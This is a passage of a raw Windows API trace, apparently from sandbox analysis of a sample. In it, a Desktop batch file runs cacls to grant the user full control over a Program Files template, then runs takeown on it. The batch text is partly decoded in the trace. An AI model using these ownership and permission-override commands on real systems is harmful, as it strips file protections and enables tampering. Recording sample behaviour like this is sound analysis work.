MemoryPointer=0x404258) returned 0x60 [0228.439] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0228.439] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0228.439] GetProcessHeap () returned 0x3f0000 [0228.439] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x120) returned 0x4042c0 [0228.439] GetProcessHeap () returned 0x3f0000 [0228.439] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x238) returned 0x4043e8 [0228.443] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.443] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0xffffffff [0228.443] GetLastError () returned 0x2 [0228.444] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0xffffffff [0228.444] GetLastError () returned 0x2 [0228.444] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.445] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0x404598 [0228.445] GetProcessHeap () returned 0x3f0000 [0228.445] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x401810, Size=0x4) returned 0x401810 [0228.445] FindClose (in: hFindFile=0x404598 | out: hFindFile=0x404598) returned 1 [0228.445] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0xffffffff [0228.445] GetLastError () returned 0x2 [0228.446] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0x404598 [0228.446] FindClose (in: hFindFile=0x404598 | out: hFindFile=0x404598) returned 1 [0228.446] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0228.446] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0228.446] GetConsoleTitleW (in: lpConsoleTitle=0x14f06c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.536] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x404890, lpFilePart=0x14eb8c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14eb8c*="Desktop") returned 0x25 [0228.537] SetErrorMode (uMode=0x0) returned 0x1 [0228.537] GetProcessHeap () returned 0x3f0000 [0228.537] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x404888, Size=0x60) returned 0x404888 [0228.537] GetProcessHeap () returned 0x3f0000 [0228.537] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x404888) returned 0x60 [0228.537] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0228.537] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0228.537] GetProcessHeap () returned 0x3f0000 [0228.537] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x120) returned 0x4048f0 [0228.537] GetProcessHeap () returned 0x3f0000 [0228.537] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x238) returned 0x404a18 [0228.537] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.538] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0xffffffff [0228.538] GetLastError () returned 0x2 [0228.538] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0xffffffff [0228.539] GetLastError () returned 0x2 [0228.539] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.539] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0x404bc8 [0228.539] FindClose (in: hFindFile=0x404bc8 | out: hFindFile=0x404bc8) returned 1 [0228.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0xffffffff [0228.540] GetLastError () returned 0x2 [0228.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0x404bc8 [0228.540] FindClose (in: hFindFile=0x404bc8 | out: hFindFile=0x404bc8) returned 1 [0228.540] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0228.540] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0228.540] GetConsoleTitleW (in: lpConsoleTitle=0x14ee00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.541] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ec88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ed50 | out: lpAttributeList=0x14ec88, lpSize=0x14ed50) returned 1 [0228.541] UpdateProcThreadAttribute (in: lpAttributeList=0x14ec88, dwFlags=0x0, Attribute=0x60001, lpValue=0x14ed48, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ec88, lpPreviousValue=0x0) returned 1 [0228.541] GetStartupInfoW (in: lpStartupInfo=0x14ec44 | out: lpStartupInfo=0x14ec44*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0228.541] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0228.543] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x14ece4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ed30 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x14ed30*(hProcess=0x74, hThread=0x78, dwProcessId=0x78c, dwThreadId=0x5d8)) returned 1 [0228.744] CloseHandle (hObject=0x78) returned 1 [0228.744] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0228.744] GetProcessHeap () returned 0x3f0000 [0228.744] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x405fb0 | out: hHeap=0x3f0000) returned 1 [0228.744] GetEnvironmentStringsW () returned 0x405fb0* [0228.744] GetProcessHeap () returned 0x3f0000 [0228.744] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb36) returned 0x406af0 [0228.744] FreeEnvironmentStringsW (penv=0x405fb0) returned 1 [0228.744] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0234.764] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x14ec24 | out: lpExitCode=0x14ec24*=0x1f57) returned 1 [0234.765] CloseHandle (hObject=0x74) returned 1 [0234.765] _vsnwprintf (in: _Buffer=0x14ed6c, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ec30 | out: _Buffer="00001F57") returned 8 [0234.765] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0234.765] GetProcessHeap () returned 0x3f0000 [0234.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x406af0 | out: hHeap=0x3f0000) returned 1 [0234.765] GetEnvironmentStringsW () returned 0x405fb0* [0234.765] GetProcessHeap () returned 0x3f0000 [0234.765] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb5c) returned 0x408198 [0234.765] FreeEnvironmentStringsW (penv=0x405fb0) returned 1 [0234.765] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0234.765] GetProcessHeap () returned 0x3f0000 [0234.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x408198 | out: hHeap=0x3f0000) returned 1 [0234.765] GetEnvironmentStringsW () returned 0x405fb0* [0234.765] GetProcessHeap () returned 0x3f0000 [0234.766] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb5c) returned 0x408198 [0234.766] FreeEnvironmentStringsW (penv=0x405fb0) returned 1 [0234.766] GetProcessHeap () returned 0x3f0000 [0234.766] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0db8 | out: hHeap=0x3f0000) returned 1 [0234.766] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ec88 | out: lpAttributeList=0x14ec88) [0234.766] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.766] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.766] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.766] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0234.767] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.767] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0234.767] SetConsoleInputExeNameW () returned 0x1 [0234.767] GetConsoleOutputCP () returned 0x1b5 [0234.768] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0234.768] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14f4a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0234.769] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0234.769] _get_osfhandle (_FileHandle=3) returned 0x74 [0234.769] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0234.769] GetProcessHeap () returned 0x3f0000 [0234.769] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404b48 | out: hHeap=0x3f0000) returned 1 [0234.769] GetProcessHeap () returned 0x3f0000 [0234.769] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404a18 | out: hHeap=0x3f0000) returned 1 [0234.769] GetProcessHeap () returned 0x3f0000 [0234.769] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4048f0 | out: hHeap=0x3f0000) returned 1 [0234.769] GetProcessHeap () returned 0x3f0000 [0234.769] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404888 | out: hHeap=0x3f0000) returned 1 [0234.769] GetProcessHeap () returned 0x3f0000 [0234.769] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4047b0 | out: hHeap=0x3f0000) returned 1 [0234.769] GetProcessHeap () returned 0x3f0000 [0234.769] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404598 | out: hHeap=0x3f0000) returned 1 [0234.770] GetProcessHeap () returned 0x3f0000 [0234.770] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404518 | out: hHeap=0x3f0000) returned 1 [0234.770] GetProcessHeap () returned 0x3f0000 [0234.770] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4043e8 | out: hHeap=0x3f0000) returned 1 [0234.770] GetProcessHeap () returned 0x3f0000 [0234.770] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4042c0 | out: hHeap=0x3f0000) returned 1 [0234.770] GetProcessHeap () returned 0x3f0000 [0234.770] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404258 | out: hHeap=0x3f0000) returned 1 [0234.770] GetProcessHeap () returned 0x3f0000 [0234.770] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404190 | out: hHeap=0x3f0000) returned 1 [0234.770] GetProcessHeap () returned 0x3f0000 [0234.770] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0ab8 | out: hHeap=0x3f0000) returned 1 [0234.770] GetProcessHeap () returned 0x3f0000 [0234.770] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f1250 | out: hHeap=0x3f0000) returned 1 [0234.770] _get_osfhandle (_FileHandle=3) returned 0x74 [0234.770] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0234.770] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f488, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x14f488*=0xc2, lpOverlapped=0x0) returned 1 [0234.770] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0234.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0234.771] _get_osfhandle (_FileHandle=3) returned 0x74 [0234.771] GetFileType (hFile=0x74) returned 0x1 [0234.772] _get_osfhandle (_FileHandle=3) returned 0x74 [0234.772] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0234.772] GetProcessHeap () returned 0x3f0000 [0234.772] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x414b28 [0234.772] GetProcessHeap () returned 0x3f0000 [0234.772] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b28 | out: hHeap=0x3f0000) returned 1 [0234.775] _tell (_FileHandle=3) returned 47 [0234.775] _close (_FileHandle=3) returned 0 [0234.775] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f25c | out: _Buffer="\r\n") returned 2 [0234.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.775] GetFileType (hFile=0x7) returned 0x2 [0234.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.776] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f21c | out: lpMode=0x14f21c) returned 1 [0234.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.776] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f248, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f248*=0x2) returned 1 [0234.779] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0234.779] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.779] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14f258 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0234.780] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14f258 | out: _Buffer=">") returned 1 [0234.780] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.780] GetFileType (hFile=0x7) returned 0x2 [0234.780] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.780] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f220 | out: lpMode=0x14f220) returned 1 [0234.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.781] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14f24c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x14f24c*=0x26) returned 1 [0234.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.781] GetFileType (hFile=0x7) returned 0x2 [0234.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.782] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4a4 | out: lpMode=0x14f4a4) returned 1 [0234.782] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.782] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3f0ac0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x14f4d0, lpReserved=0x0 | out: lpBuffer=0x3f0ac0*, lpNumberOfCharsWritten=0x14f4d0*=0x7) returned 1 [0234.783] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f4dc | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\" ") returned 63 [0234.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.783] GetFileType (hFile=0x7) returned 0x2 [0234.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.783] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0234.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.784] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x3f) returned 1 [0234.786] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f4fc | out: _Buffer="\r\n") returned 2 [0234.786] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.786] GetFileType (hFile=0x7) returned 0x2 [0234.787] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.787] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4bc | out: lpMode=0x14f4bc) returned 1 [0234.787] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f4e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4e8*=0x2) returned 1 [0234.789] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0234.790] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0234.790] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0234.790] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0234.790] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0234.790] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0234.790] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0234.790] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0234.790] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0234.790] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0234.790] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0234.790] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0234.790] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0234.790] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0234.790] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0234.790] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0234.790] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0234.790] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0234.790] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0234.790] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0234.790] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0234.790] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0234.790] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0234.790] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0234.790] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0234.791] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0234.791] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0234.791] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0234.791] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0234.791] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0234.791] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0234.791] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0234.791] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0234.791] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0234.791] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0234.791] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0234.791] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0234.791] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0234.791] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0234.791] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0234.791] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0234.791] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0234.792] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x404228, lpFilePart=0x14f2a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f2a0*="Desktop") returned 0x25 [0234.793] SetErrorMode (uMode=0x0) returned 0x1 [0234.793] GetProcessHeap () returned 0x3f0000 [0234.793] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x404220, Size=0x64) returned 0x404220 [0234.793] GetProcessHeap () returned 0x3f0000 [0234.793] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x404220) returned 0x64 [0234.793] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.793] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0234.793] GetProcessHeap () returned 0x3f0000 [0234.793] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x120) returned 0x404290 [0234.793] GetProcessHeap () returned 0x3f0000 [0234.793] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x238) returned 0x4043b8 [0234.794] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.794] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0xffffffff [0234.794] GetLastError () returned 0x2 [0234.795] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0xffffffff [0234.795] GetLastError () returned 0x2 [0234.795] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0x404568 [0234.796] FindClose (in: hFindFile=0x404568 | out: hFindFile=0x404568) returned 1 [0234.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0xffffffff [0234.796] GetLastError () returned 0x2 [0234.797] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x14f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f01c) returned 0x404568 [0234.797] FindClose (in: hFindFile=0x404568 | out: hFindFile=0x404568) returned 1 [0234.797] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0234.797] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0234.797] GetConsoleTitleW (in: lpConsoleTitle=0x14f06c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.798] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x404d18, lpFilePart=0x14eb8c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14eb8c*="Desktop") returned 0x25 [0234.798] SetErrorMode (uMode=0x0) returned 0x1 [0234.798] GetProcessHeap () returned 0x3f0000 [0234.798] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x404d10, Size=0x64) returned 0x404d10 [0234.798] GetProcessHeap () returned 0x3f0000 [0234.798] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x404d10) returned 0x64 [0234.798] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.798] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0234.799] GetProcessHeap () returned 0x3f0000 [0234.799] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x120) returned 0x404820 [0234.799] GetProcessHeap () returned 0x3f0000 [0234.799] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x238) returned 0x404948 [0234.799] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.800] FindFirstFileExW (in: 